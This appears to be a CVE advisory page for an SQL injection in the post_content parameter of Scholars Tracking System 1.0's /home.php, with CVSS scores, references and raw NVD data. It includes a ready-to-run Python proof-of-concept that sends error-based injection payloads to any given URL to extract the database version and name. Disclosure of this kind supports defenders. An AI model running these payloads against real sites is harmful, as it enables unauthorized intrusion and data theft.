CVE-2025-14951

Description

A security vulnerability has been detected in code-projects Scholars Tracking System 1.0. The impacted element is an unknown function of the file /home.php. Such manipulation of the argument post_content leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:scholars_tracking_system:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Scholars Tracking System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-14951 SQL Injection PoC
# Target: code-projects Scholars Tracking System 1.0
# File: /home.php
# Parameter: post_content

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in post_content parameter
    """
    # Construct the malicious request
    endpoint = f"{target_url}/home.php"
    
    # SQL injection payload - extract database version
    data = {
        'post_content': payload
    }
    
    try:
        response = requests.post(endpoint, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

def extract_database_info(target_url):
    """
    Extract database version information using error-based SQL injection
    """
    # Payload to extract MySQL version
    payload = "1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@version), FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.TABLES GROUP BY x) a) -- -"
    
    print(f"[*] Sending payload to extract database version...")
    result = exploit_sqli(target_url, payload)
    print(f"[+] Response:\n{result}")
    
    return result

def extract_current_database(target_url):
    """
    Extract current database name
    """
    payload = "1' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), FLOOR(RAND(0)*2)) x FROM INFORMATION_SCHEMA.TABLES GROUP BY x) a) -- -"
    
    print(f"[*] Sending payload to extract database name...")
    result = exploit_sqli(target_url, payload)
    print(f"[+] Response:\n{result}")
    
    return result

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-14951.py <target_url>")
        print("Example: python cve-2025-14951.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print(f"[*] CVE-2025-14951 SQL Injection PoC")
    print(f"[*] Target: {target}")
    print(f"[*] Exploiting /home.php post_content parameter\n")
    
    extract_database_info(target)
    print("\n" + "="*50 + "\n")
    extract_current_database(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14951
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14951
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14951/
[4] VulDB https://vuldb.com/cve/CVE-2025-14951
[5] https://code-projects.org/
[6] https://github.com/gx922/CVE/issues/3
[7] https://vuldb.com/?ctiid.337587
[8] https://vuldb.com/?id.337587
[9] https://vuldb.com/?submit.716185
[10] https://github.com/gx922/CVE/issues/3

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14951", "sourceIdentifier": "[email protected]", "published": "2025-12-19T15:15:55.470", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in code-projects Scholars Tracking System 1.0. The impacted element is an unknown function of the file /home.php. Such manipulation of the argument post_content leads to sql injection. The attack can be executed remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:scholars_tracking_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "181B8F36-C4C5-4F67-AC1F-79162D790489"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/gx922/CVE/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337587", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337587", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.716185", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/gx922/CVE/issues/3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}]}}